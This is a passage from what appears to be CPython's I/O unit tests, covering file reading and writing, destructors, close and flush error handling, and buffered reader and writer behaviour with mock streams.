b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 5.3) with self.open(support.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(support.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(support.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(support.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(support.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with support.check_warnings(('', ResourceWarning)): f = MyFileIO(support.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(support.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, support.TESTFN, 'w', closefd=False) def test_read_closed(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") with self.open(support.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(support.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(support.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(support.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with support.check_warnings(('', ResourceWarning)): f = self.FileIO(support.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(support.TESTFN, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(support.TESTFN, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w', closefd=False) os.close(fd) def test_multi_close(self): f = self.open(support.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") fd = os.open(support.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with support.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(support.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with support.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(support.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") check_path_succeeds(FakePath(support.TESTFN)) check_path_succeeds(FakePath(os.fsencode(support.TESTFN))) with self.open(support.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): self.open(FakePath(support.TESTFN), 'rwxa') def test_RawIOBase_readall(self): # Exercise the default unlimited RawIOBase.read() and readall() # implementations. rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.read(), b"abcdefg") rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.readall(), b"abcdefg") def test_BufferedIOBase_readinto(self): # Exercise the default BufferedIOBase.readinto() and readinto1() # implementations (which call read() or read1() internally). class Reader(self.BufferedIOBase): def __init__(self, avail): self.avail = avail def read(self, size): result = self.avail[:size] self.avail = self.avail[size:] return result def read1(self, size): """Returns no more than 5 bytes at once""" return self.read(min(size, 5)) tests = ( # (test method, total data available, read buffer size, expected # read size) ("readinto", 10, 5, 5), ("readinto", 10, 6, 6), # More than read1() can return ("readinto", 5, 6, 5), # Buffer larger than total available ("readinto", 6, 7, 6), ("readinto", 10, 0, 0), # Empty buffer ("readinto1", 10, 5, 5), # Result limited to single read1() call ("readinto1", 10, 6, 5), # Buffer larger than read1() can return ("readinto1", 5, 6, 5), # Buffer larger than total available ("readinto1", 6, 7, 5), ("readinto1", 10, 0, 0), # Empty buffer ) UNUSED_BYTE = 0x81 for test in tests: with self.subTest(test): method, avail, request, result = test reader = Reader(bytes(range(avail))) buffer = bytearray((UNUSED_BYTE,) * request) method = getattr(reader, method) self.assertEqual(method(buffer), result) self.assertEqual(len(buffer), request) self.assertSequenceEqual(buffer[:result], range(result)) unused = (UNUSED_BYTE,) * (request - result) self.assertSequenceEqual(buffer[result:], unused) self.assertEqual(len(reader.avail), avail - result) def test_close_assert(self): class R(self.IOBase): def __setattr__(self, name, value): pass def flush(self): raise OSError() f = R() # This would cause an assertion failure. self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) self.assertEqual(b"c", bufio.read1(100)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"d", bufio.read1(100)) self.assertEqual(rawio._reads, 2) self.assertEqual(b"efg", bufio.read1(100)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1(100)) self.assertEqual(rawio._reads, 4) def test_read1_arbitrary(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"bc", bufio.read1()) self.assertEqual(b"d", bufio.read1()) self.assertEqual(b"efg", bufio.read1(-1)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1()) self.assertEqual(rawio._reads, 4) def test_readinto(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) b = bytearray(2) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"cd") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ef") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"gf") self.assertEqual(bufio.readinto(b), 0) self.assertEqual(b, b"gf") rawio = self.MockRawIO((b"abc", None)) bufio = self.tp(rawio) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"cb") def test_readinto1(self): buffer_size = 10 rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl")) bufio = self.tp(rawio, buffer_size=buffer_size) b = bytearray(2) self.assertEqual(bufio.peek(3), b'abc') self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"ab") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 1) self.assertEqual(b[:1], b"c") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"de") self.assertEqual(rawio._reads, 2) b = bytearray(2*buffer_size) self.assertEqual(bufio.peek(3), b'fgh') self.assertEqual(rawio._reads, 3) self.assertEqual(bufio.readinto1(b), 6) self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly implementation-dependent self.assertEqual(rawio.read_history, raw_read_sizes) def test_read_non_blocking(self): # Inject some None's in there to simulate EWOULDBLOCK rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None)) bufio = self.tp(rawio) self.assertEqual(b"abcd", bufio.read(6)) self.assertEqual(b"e", bufio.read(1)) self.assertEqual(b"fg", bufio.read()) self.assertEqual(b"", bufio.peek(1)) self.assertIsNone(bufio.read()) self.assertEqual(b"", bufio.read()) rawio = self.MockRawIO((b"a", None, None)) self.assertEqual(b"a", rawio.readall()) self.assertIsNone(rawio.readall()) def test_read_past_eof(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(9000)) def test_read_all(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read()) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes with exactly the same number of 0's, # 1's... 255's. This will help us check that concurrent reading # doesn't duplicate or forget contents. N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(support.TESTFN, "wb") as f: f.write(s) with self.open(support.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with support.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: support.unlink(support.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(support.unlink, support.TESTFN) with support.check_warnings(('', ResourceWarning)): rawio = self.FileIO(support.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = self.MockRawIO() buf = self.tp(raw) buf.write(b"howdy!") self.assertFalse(raw._write_stack) buf.detach() self.assertEqual(raw._write_stack, [b"howdy!"]) def test_write(self): # Write to the buffered IO but don't overflow the buffer. writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") self.assertFalse(writer._write_stack) buffer = bytearray(b"def") bufio.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data bufio.flush() self.assertEqual(b"".join(writer._write_stack), b"abcdef") def test_write_overflow(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) contents = b"abcdefghijklmnop" for n in range(0, len(contents), 3): bufio.write(contents[n:n+3]) flushed = b"".join(writer._write_stack) # At least (total - 8) bytes were implicitly flushed, perhaps more # depending on the implementation. self.assertTrue(flushed.startswith(contents[:-8]), flushed) def check_writes(self, intermediate_func): # Lots of writes, test the flushed output is as expected. contents = bytes(range(256)) * 1000 n = 0 writer = self.MockRawIO() bufio = self.tp(writer, 13) # Generator of write sizes: repeat each N 15 times then proceed to N+1 def gen_sizes(): for size in count(1): for i in range(15): yield size sizes = gen_sizes() while n < len(contents): size = min(next(sizes), len(contents) - n) self.assertEqual(bufio.write(contents[n:n+size]), size) intermediate_func(bufio) n += size bufio.flush() self.assertEqual(contents, b"".join(writer._write_stack)) def test_writes(self): self.check_writes(lambda bufio: None) def test_writes_and_flushes(self): 